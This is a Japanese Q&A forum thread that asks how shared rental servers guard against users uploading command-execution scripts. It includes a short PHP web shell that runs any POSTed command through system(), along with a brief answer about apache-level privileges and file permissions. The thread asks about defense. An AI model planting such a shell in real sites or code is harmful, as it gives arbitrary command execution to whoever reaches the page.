- 締切済み
悪意のあるユーザーについて
コーディング中、ふと気になった事があります。 コマンドインジェクションなんですが、 例えばですが、悪意があるユーザーが下記のようなソースをパーミッション777のディレクトリにアップした時、 ある程度、好きにコマンドが実行出来てしまったりしますよね。 レンタルサーバはどのように対策をしているのでしょうか? sample.php <html> <head> </head> <body> <form method="POST"> <input type="text" name="cmd" value="<?php echo is_null($_POST['cmd'])?'ls -la':$_POST['cmd'];?>" /> <input type="submit" /> </form> <hr /> <textarea cols="140" rows="10"> <?php if(!is_null($_POST['cmd']))system($_POST['cmd']);?> </textarea> </body> </html>
- みんなの回答 (1)
- 専門家の回答
みんなの回答
- windfactA
- ベストアンサー率63% (52/82)
回答No.1
コマンドの実行はできそうですが、実行権限がapacheなどになります。 スーパーユーザ権限で実行できるわけではないので、 例えばrmでシステムファイルを削除しようとしても permission denied(権限がない)となるだけです。 >ある程度、好きにコマンドが実行出来てしまったりしますよね。 ある程度、ですね。 >レンタルサーバはどのように対策をしているのでしょうか? 触られたくないファイルのパーミッションを700にしてる、とか?
お礼
返信が遅くなり申し訳ありませんでした。 apache権限なのは理解してました。 でもapacheで覗ける場所はどこでも見れてしまうって事ですよね? /home/<username>/public_html内部とか…。 もう少し調べてみます。 ありがとうございました。